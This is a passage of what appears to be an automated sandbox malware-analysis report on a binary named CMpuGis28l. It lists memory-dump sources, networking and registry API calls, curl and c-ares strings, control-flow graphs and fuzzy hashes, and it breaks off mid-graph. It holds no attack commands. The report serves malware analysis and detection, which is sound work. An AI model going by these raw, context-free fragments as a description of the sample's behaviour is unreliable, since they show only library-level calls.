                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: EventSelect$EnumEventsNetwork
                                                        • String ID: multi.c
                                                        • API String ID: 2170980988-214371023
                                                        • Opcode ID: 86d676aa162f9d647eae8603168f97e835771cd4e6ce9201d2fae8bbe755e3e1
                                                        • Instruction ID: 68bb2bacc08606ddf171e8b4a4bbb995f74e82b6977e1b3782ffea8fa9677739
                                                        • Opcode Fuzzy Hash: 86d676aa162f9d647eae8603168f97e835771cd4e6ce9201d2fae8bbe755e3e1
                                                        • Instruction Fuzzy Hash: 40D1BE71A083019BE750EF20CC81BAB77E5BF94358F44882DF98596251EB74E948EB52

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1787 103b180-103b195 1788 103b3e0-103b3e7 1787->1788 1789 103b19b-103b1a2 1787->1789 1790 103b1b0-103b1b9 1789->1790 1790->1790 1791 103b1bb-103b1bd 1790->1791 1791->1788 1792 103b1c3-103b1d0 1791->1792 1794 103b1d6-103b1f2 1792->1794 1795 103b3db 1792->1795 1796 103b229-103b22d 1794->1796 1795->1788 1797 103b233-103b246 1796->1797 1798 103b3e8-103b417 1796->1798 1799 103b260-103b264 1797->1799 1800 103b248-103b24b 1797->1800 1805 103b582-103b589 1798->1805 1806 103b41d-103b429 1798->1806 1802 103b269-103b286 call 103af30 1799->1802 1803 103b215-103b223 1800->1803 1804 103b24d-103b256 1800->1804 1815 103b2f0-103b301 1802->1815 1816 103b288-103b2a3 call 103b060 1802->1816 1803->1796 1808 103b315-103b33c call 12f8b00 1803->1808 1804->1802 1810 103b435-103b44c call 103b590 1806->1810 1811 103b42b-103b433 call 103b590 1806->1811 1818 103b342-103b347 1808->1818 1819 103b3bf-103b3ca 1808->1819 1826 103b458-103b471 call 103b590 1810->1826 1827 103b44e-103b456 call 103b590 1810->1827 1811->1810 1815->1803 1836 103b307-103b310 1815->1836 1832 103b200-103b213 call 103b020 1816->1832 1833 103b2a9-103b2c7 getsockname call 103b020 1816->1833 1823 103b384-103b38f 1818->1823 1824 103b349-103b358 1818->1824 1828 103b3cc-103b3d9 1819->1828 1823->1819 1831 103b391-103b3a5 1823->1831 1830 103b360-103b382 1824->1830 1845 103b473-103b487 1826->1845 1846 103b48c-103b4a7 1826->1846 1827->1826 1828->1788 1830->1823 1830->1830 1837 103b3b0-103b3bd 1831->1837 1832->1803 1843 103b2cc-103b2dd 1833->1843 1836->1828 1837->1819 1837->1837 1843->1803 1849 103b2e3 1843->1849 1845->1805 1847 103b4b3-103b4cb call 103b660 1846->1847 1848 103b4a9-103b4b1 call 103b660 1846->1848 1854 103b4d9-103b4f5 call 103b660 1847->1854 1855 103b4cd-103b4d5 call 103b660 1847->1855 1848->1847 1849->1836 1860 103b4f7-103b50b 1854->1860 1861 103b50d-103b52b call 103b770 * 2 1854->1861 1855->1854 1860->1805 1861->1805 1866 103b52d-103b531 1861->1866 1867 103b533-103b53b 1866->1867 1868 103b580 1866->1868 1869 103b578-103b57e 1867->1869 1870 103b53d-103b547 1867->1870 1868->1805 1869->1805 1870->1869 1871 103b549-103b54d 1870->1871 1871->1869 1872 103b54f-103b558 1871->1872 1872->1869 1873 103b55a-103b576 call 103b870 * 2 1872->1873 1873->1805 1873->1869
                                                        APIs
                                                        • getsockname.WS2_32(-00000020,-00000020,?), ref: 0103B2B6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: getsockname
                                                        • String ID: ares__sortaddrinfo.c$cur != NULL
                                                        • API String ID: 3358416759-2430778319
                                                        • Opcode ID: 0baf786e00fd68ff37961abf55e1eb40b6eb76af8c4e69e523d6fb228ab04ed9
                                                        • Instruction ID: 398c9b42d2d707e8d719b4268877d3f3ec76c22669e5cf42f4422087711f9134
                                                        • Opcode Fuzzy Hash: 0baf786e00fd68ff37961abf55e1eb40b6eb76af8c4e69e523d6fb228ab04ed9
                                                        • Instruction Fuzzy Hash: 34C15C716042159FD718DF28C880A6ABBE5AFC8318F04896CE9899B3A1DB35ED45CB81
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 401cabd9675e404c3b810aa9e30981df2467d67bc1a818f37c024a646e453206
                                                        • Instruction ID: da862669e31ce93ca34932db5135341a039e692cb18c470e64806bbaa72b2fd5
                                                        • Opcode Fuzzy Hash: 401cabd9675e404c3b810aa9e30981df2467d67bc1a818f37c024a646e453206
                                                        • Instruction Fuzzy Hash: E391E131A0C7498BD735BA2988947FBB2D5AFC0370F348B2CE8A9421D4E770DC40A782
                                                        APIs
                                                        • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0102712E,?,?,?,00001001,00000000), ref: 0103A90D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: recvfrom
                                                        • String ID:
                                                        • API String ID: 846543921-0
                                                        APIs
                                                        • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0102A499
                                                        • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0102A4FB
                                                        • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0102A531
                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0102AA19
                                                        • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0102AA4C
                                                        • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0102AA97
                                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0102AAE9
                                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0102AB30
                                                        • RegCloseKey.KERNELBASE(?), ref: 0102AB6A
                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0102AB82
                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0102AC46
                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0102AD0A
                                                        • RegEnumKeyExA.KERNELBASE ref: 0102AD8D
                                                        • RegCloseKey.KERNELBASE(?), ref: 0102ADD9
                                                        • RegEnumKeyExA.KERNELBASE ref: 0102AE08
                                                        • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0102AE2A
                                                        • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0102AE54
                                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0102AF63
                                                        • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0102AFB2
                                                        • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0102B072
                                                        Similarity
                                                        • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                        • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                        • API String ID: 4281207131-1047472027
                                                        APIs
                                                        • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00FAA832
                                                        Strings
                                                        • @, xrefs: 00FAA8F4
                                                        • bind failed with errno %d: %s, xrefs: 00FAB080
                                                        • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00FAA6CE
                                                        • @, xrefs: 00FAAC42
                                                        • Bind to local port %d failed, trying next, xrefs: 00FAAFE5
                                                        • Name '%s' family %i resolved to '%s' family %i, xrefs: 00FAADAC
                                                        • cf-socket.c, xrefs: 00FAA5CD, 00FAA735
                                                        • Trying %s:%d..., xrefs: 00FAA7C2, 00FAA7DE
                                                        • cf_socket_open() -> %d, fd=%d, xrefs: 00FAA796
                                                        • Could not set TCP_NODELAY: %s, xrefs: 00FAA871
                                                        • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00FAAD0A
                                                        • Trying [%s]:%d..., xrefs: 00FAA689
                                                        • Local Interface %s is ip %s using address family %i, xrefs: 00FAAE60
                                                        • Couldn't bind to '%s' with errno %d: %s, xrefs: 00FAAE1F
                                                        • Local port: %hu, xrefs: 00FAAF28
                                                        Similarity
                                                        • API ID: setsockopt
                                                        • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                        • API String ID: 3981526788-2373386790

                                                        Control-flow Graph

                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 01039946
                                                        • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 01039974
                                                        • RegCloseKey.KERNELBASE(?), ref: 0103998B
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                        • API String ID: 3677997916-4129964100

                                                        Control-flow Graph

                                                        APIs
                                                        • connect.WS2_32(?,?,00000001), ref: 00FA8C30
                                                        • SleepEx.KERNELBASE(00000000,00000000), ref: 00FA8CF3
                                                        Similarity
                                                        • API ID: Sleepconnect
                                                        • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                        • API String ID: 238548546-879669977
                                                        • Opcode ID: e0dd4e9eb4e305844b1433ab0dc62137c7f07377accca78bcd44b38faea117e4
                                                        • Instruction ID: 5b6ec7823cd68da7b815abee5f88e0f6a0413759da33144d5b3f4a8dcc356763
                                                        • Opcode Fuzzy Hash: e0dd4e9eb4e305844b1433ab0dc62137c7f07377accca78bcd44b38faea117e4
                                                        • Instruction Fuzzy Hash: 11B1E6B0A04306EFD710DF24CC85BA677E4AF423A4F14852CE8594B2D2DBB5EC56EB61

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1447 f72f17-f72f8c call 13f0df0 call 13f11e0 1452 f731c9-f731cd 1447->1452 1453 f731d3-f731d6 1452->1453 1454 f72f91-f72ff4 call f71619 RegOpenKeyExA 1452->1454 1457 f731c5 1454->1457 1458 f72ffa-f7300b 1454->1458 1457->1452 1459 f7315c-f731ac RegEnumKeyExA 1458->1459 1460 f731b2-f731c2 1459->1460 1461 f73010-f73083 call f71619 RegOpenKeyExA 1459->1461 1460->1457 1465 f7314e-f73152 1461->1465 1466 f73089-f730d4 RegQueryValueExA 1461->1466 1465->1459 1467 f730d6-f73137 call 13f10c0 call 13f1150 call 13f11e0 call 13f0ff0 call 13f11e0 call 13ef560 1466->1467 1468 f7313b-f7314b RegCloseKey 1466->1468 1467->1468 1468->1465
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: EnumOpen
                                                        • String ID: d
                                                        • API String ID: 3231578192-2564639436
                                                        • Opcode ID: 0b73a983fa2282059fd391aded35ac824ec4ca1c0974273a1413423fa688e827
                                                        • Instruction ID: 2ecec21eb8ae37e3e40195401e196e4911d9d67c7778fb0887ccffc3de8a8efa
                                                        • Opcode Fuzzy Hash: 0b73a983fa2282059fd391aded35ac824ec4ca1c0974273a1413423fa688e827
                                                        • Instruction Fuzzy Hash: 8371A2B490431ADFDB50DF69D98479EBBF0BF84308F10885DE99897300E7749A889F92

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1481 fa9290-fa92ed call f776a0 1484 fa93c3-fa93ce 1481->1484 1485 fa92f3-fa92fb 1481->1485 1494 fa93d0-fa93e1 1484->1494 1495 fa93e5-fa9427 call f8d090 call fb4f40 1484->1495 1486 fa93aa-fa93af 1485->1486 1487 fa9301-fa9333 call f8d8c0 call f8d9a0 1485->1487 1488 fa9456-fa9470 1486->1488 1489 fa93b5-fa93bc 1486->1489 1506 fa93a7 1487->1506 1507 fa9335-fa9364 WSAIoctl 1487->1507 1492 fa9429-fa9431 1489->1492 1493 fa93be 1489->1493 1497 fa9439-fa943f 1492->1497 1498 fa9433-fa9437 1492->1498 1493->1488 1494->1489 1499 fa93e3 1494->1499 1495->1488 1495->1492 1497->1488 1502 fa9441-fa9453 call fb50a0 1497->1502 1498->1488 1498->1497 1499->1488 1502->1488 1506->1486 1510 fa939b-fa93a4 1507->1510 1511 fa9366-fa936f 1507->1511 1510->1506 1511->1510 1513 fa9371-fa9390 setsockopt 1511->1513 1513->1510 1514 fa9392-fa9395 1513->1514 1514->1510
                                                        APIs
                                                        • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00FA935D
                                                        • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00FA9389
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: Ioctlsetsockopt
                                                        • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                        • API String ID: 1903391676-2691795271
                                                        • Opcode ID: 4c59df7a3daea88ec4f49b6dc05af576883311e594d23da49b74b2acc5ec1567
                                                        • Instruction ID: 67e9576fe00091175b6757fa590bccafda030354af197afb2b7b0b0f4ebbdf56
                                                        • Opcode Fuzzy Hash: 4c59df7a3daea88ec4f49b6dc05af576883311e594d23da49b74b2acc5ec1567
                                                        • Instruction Fuzzy Hash: D35107B5A04305ABEB10DF24CC81FAAB7B9FF89324F148529FD488B282D771E951D791

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1515 f776a0-f776be 1516 f776e6-f776f2 send 1515->1516 1517 f776c0-f776c7 1515->1517 1519 f776f4-f77709 call f772a0 1516->1519 1520 f7775e-f77762 1516->1520 1517->1516 1518 f776c9-f776d1 1517->1518 1522 f776d3-f776e4 1518->1522 1523 f7770b-f77759 call f772a0 call f7cb20 call 12f8c50 1518->1523 1519->1520 1522->1519 1523->1520
                                                        APIs
                                                        • send.WS2_32(multi.c,?,?,?,00F73D4E,00000000,?,?,00F807BF), ref: 00F776EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: send
                                                        • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                        • API String ID: 2809346765-3388739168
                                                        • Opcode ID: 752c4c71576f9e34a80f6ee6892a17b6b2db28671dc74fccb7c1d6e63d797f68
                                                        • Instruction ID: 9e57c38c2452dbb1511d4e3799f3387293cd3d58e5a4efe99574dba598c769ea
                                                        • Opcode Fuzzy Hash: 752c4c71576f9e34a80f6ee6892a17b6b2db28671dc74fccb7c1d6e63d797f68
                                                        • Instruction Fuzzy Hash: F7113AB1969344BFD3207A659C56E273B5CEBC2B6CF45590EBC082B341D265AC01D6F3

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1534 12fd1b0-12fd261 call 12f8d18 1537 12fd397-12fd3a1 1534->1537 1538 12fd267-12fd26e 1534->1538 1539 12fd2ba-12fd2bd 1538->1539 1540 12fd2bf-12fd2e5 1539->1540 1541 12fd270-12fd281 1539->1541 1544 12fd2eb-12fd304 1540->1544 1545 12fd390 1540->1545 1542 12fd28c-12fd296 1541->1542 1543 12fd283-12fd28a 1541->1543 1547 12fd29c 1542->1547 1548 12fd320-12fd327 call 12f8c68 1542->1548 1543->1542 1546 12fd29f-12fd2a2 1543->1546 1549 12fd306-12fd312 1544->1549 1545->1537 1550 12fd2a9-12fd2b4 1546->1550 1547->1546 1554 12fd32c 1548->1554 1551 12fd338-12fd33d 1549->1551 1552 12fd314-12fd317 1549->1552 1550->1539 1550->1545 1555 12fdacb-12fdae0 call 12fb620 1551->1555 1556 12fd343-12fd346 1551->1556 1557 12fd58d-12fd58f 1552->1557 1558 12fd48b-12fd48d 1552->1558 1559 12fd5ab-12fd5ad 1552->1559 1560 12fd5c9-12fd5cc 1552->1560 1561 12fd4a6-12fd4a8 1552->1561 1562 12fd686-12fd68f 1552->1562 1563 12fd4c4-12fd4d7 call 12fb620 1552->1563 1564 12fd5e2-12fd5e4 1552->1564 1565 12fd600-12fd60a 1552->1565 1566 12fd6e0-12fd715 call 12fb680 1552->1566 1567 12fd4dc-12fd4de 1552->1567 1568 12fd6b3-12fd6bc 1552->1568 1569 12fd550-12fd556 1552->1569 1554->1546 1555->1550 1556->1555 1581 12fd34c-12fd34e 1556->1581 1574 12fd380-12fd384 1557->1574 1578 12fd595-12fd5a6 1557->1578 1558->1574 1587 12fd493-12fd4a1 1558->1587 1559->1574 1579 12fd5b3-12fd5c4 1559->1579 1577 12fd5d2-12fd5dd 1560->1577 1580 12fdb9c-12fdbbd 1560->1580 1561->1574 1588 12fd4ae-12fd4bf 1561->1588 1589 12fda2c-12fda45 call 12fc9a0 1562->1589 1590 12fd695-12fd6ae call 12fc9a0 1562->1590 1563->1550 1582 12fd5ea-12fd5fb 1564->1582 1583 12fdab1-12fdab4 1564->1583 1584 12fd8b2-12fd8c7 1565->1584 1585 12fd610-12fd623 1565->1585 1566->1550 1573 12fd4e4-12fd52f localeconv call 1307890 1567->1573 1567->1574 1571 12fd9be-12fd9ce call 12fca30 1568->1571 